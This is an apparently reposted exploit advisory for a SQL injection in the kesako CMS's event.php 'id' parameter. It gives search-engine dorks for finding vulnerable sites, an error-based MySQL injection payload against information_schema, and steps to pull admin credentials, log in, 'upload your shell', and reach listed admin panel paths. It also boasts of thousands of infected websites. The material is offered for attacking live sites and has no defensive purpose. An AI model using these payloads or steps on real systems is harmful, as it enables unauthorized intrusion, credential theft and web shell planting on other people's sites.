Bài liên quan
kesako script SQL Injection===================================================================#####################################################################.:. Exploit Title : kesako Script Sql Injection ## .:. Author : Microsoft-dz ##.:. Contact : [ifyoucanbebeme@gmail.com] ##.:. Dork : intext:powered by [kesako] inurl:/event.php?id= ##.:. Dork 2 : intext:powered by [kesako] # #.:. Tested on : win&linux ##.:. Vendor's Website : http://www.kesako.ch/cms/ ##.:. Date : [2014/5/19] #####################################################################VULNERABILITY##############[~] VULNERABILITY}~~[~] www.site.com/modules/event.php?id=[SQL INJECTION][~] www.site.com/modules/event.php?id=[SQL INJECTION]#########P0C#########Type: String Mysql Injectionhttp://SITE/modules/event.php?id=[SQL INJECTION]http://site/modules/event.php?id=202 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1####################################################################1- Get Admin Infos 2- then login and upload your shell EnjoyAbout #20K Infected Websites :vYou Can Find The Admin Panel @ http://site/cms/adminor http://site/cms/user/or http://site/cms/login/#########################################################################Tnx: R3Z0Uk4
Post a Comment